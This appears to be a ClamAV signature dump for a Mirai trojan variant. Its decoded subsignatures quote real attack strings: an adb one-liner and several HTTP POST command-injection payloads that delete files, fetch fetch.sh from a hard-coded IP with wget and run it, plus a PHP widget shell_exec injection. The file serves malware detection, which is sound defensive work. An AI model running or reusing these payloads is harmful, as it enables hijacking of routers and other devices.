VIRUS NAME: Unix.Trojan.Mirai-9761999-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1|2|3|4)>3,4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
adb -s shell cd /data/local/tmp; wget http://185.239.242.197/fetch.sh; chmod 777 fetch.sh; sh fetch.sh; rm fetch.sh
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
POST /op_type=ping&destination=cd /tmp; rm -rf*; wget http://185.239.242.197/fetch.sh; chmod 777 fetch.sh; sh fetch.sh HTTP/1.1
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
POST /cgi-bin/login.cgi HTTP/1.1
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec('cd /tmp; rm -rf *; wget http://185.239.242.197
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
target_addr=;cd%2Fvar%2Fconfig+wget+-O+-+http%3A%2F%2F185.239.242.197%2Ffetch.sh+%7C+%2Ffetch%2Fsh+sh+fetch%2Fsh&waninf=LAN
